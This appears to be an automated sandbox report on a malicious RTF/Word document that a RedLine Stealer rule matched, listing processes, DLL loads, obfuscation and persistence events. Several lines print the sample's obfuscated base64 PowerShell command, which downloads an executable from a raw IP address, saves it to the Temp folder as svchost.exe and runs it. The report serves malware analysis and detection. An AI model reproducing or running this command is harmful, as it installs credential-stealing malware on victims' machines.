        Source: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: Process Memory Space: powershell.exe PID: 1432, type: MEMORYSTR  Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engine  Classification label: mal100.troj.expl.evad.winDOC@11/17@0/1
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe  Code function: 7_2_0244BF0B CreateToolhelp32Snapshot,Module32First,7_2_0244BF0B
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File created: C:\Users\user\Desktop\~$72.rtf.doc
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Mutant created: NULL
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File created: C:\Users\user\AppData\Local\Temp\CVR63D1.tmp
        Source: 472.rtf.doc  OLE indicator, Word Document stream: true
        Source: 472.rtf.doc  OLE document summary: title field not present or empty
        Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.dr  OLE document summary: title field not present or empty
        Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.dr  OLE document summary: author field not present or empty
        Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.dr  OLE document summary: edited time not present or 0
        Source: ~DFF8D2936508DC487F.TMP.0.dr  OLE document summary: title field not present or empty
        Source: ~DFF8D2936508DC487F.TMP.0.dr  OLE document summary: author field not present or empty
        Source: ~DFF8D2936508DC487F.TMP.0.dr  OLE document summary: edited time not present or 0
        Source: C:\Windows\System32\timeout.exe  Console Write: "Waiting for 3 seconds, press a key to continue ..." (UTF-16 console output, rendered with interleaved dots in the extraction; the following writes update the countdown to 2, 1 and 0)
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File read: C:\Users\desktop.ini
        Source: C:\Windows\System32\timeout.exe  Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: 472.rtf.doc  ReversingLabs: Detection: 26%
        Source: unknown  Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  Process created: C:\Windows\System32\cmd.exe cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
        Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\timeout.exe timeout 3
        Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
        Source: C:\Windows\System32\cmd.exe  Section loaded: winbrand.dll
        Source: C:\Windows\System32\timeout.exe  Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rpcrtremote.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: bcrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: webio.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: credssp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dhcpcsvc.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe  Section loaded: wow64win.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe  Section loaded: wow64cpu.dll
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe  Section loaded: msimg32.dll
        Source: 472.rtf.LNK.0.dr  LNK file: ..\..\..\..\..\Desktop\ 472.rtf.doc
        Source: Window Recorder  Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: 472.rtf.doc  Initial sample: OLE zip file path = docProps/custom.xml
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.dr  Initial sample: OLE indicators vbamacros = False

        Data Obfuscation

        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  Process created: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
        Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe  Code function: 7_2_0244DE6C push ebp; retf 7_2_0244DE6F
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe  Code function: 7_2_0244CD12 push ebx; iretd 7_2_0244CD37
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe  Code function: 7_2_0244CB19 pushad ; iretd 7_2_0244CB1A
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe  Code function: 7_2_0244FC2D push esp; retf 7_2_0244FC30
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe  Code function: 7_2_0244CB97 push ebx; iretd 7_2_0244CD37
        Source: C:\Users\user\AppData\Local\Temp\svchost.exe  Code function: 7_2_02451AA2 push 94B57A95h; iretd 7_2_02451AB6

        Persistence and Installation Behavior

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Local\Temp\svchost.exe
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exe  Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\timeout.exe  Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477 (3 identical entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 3147
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 459
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 1290
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 4270
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 288, Thread sleep count: 3147 > 30
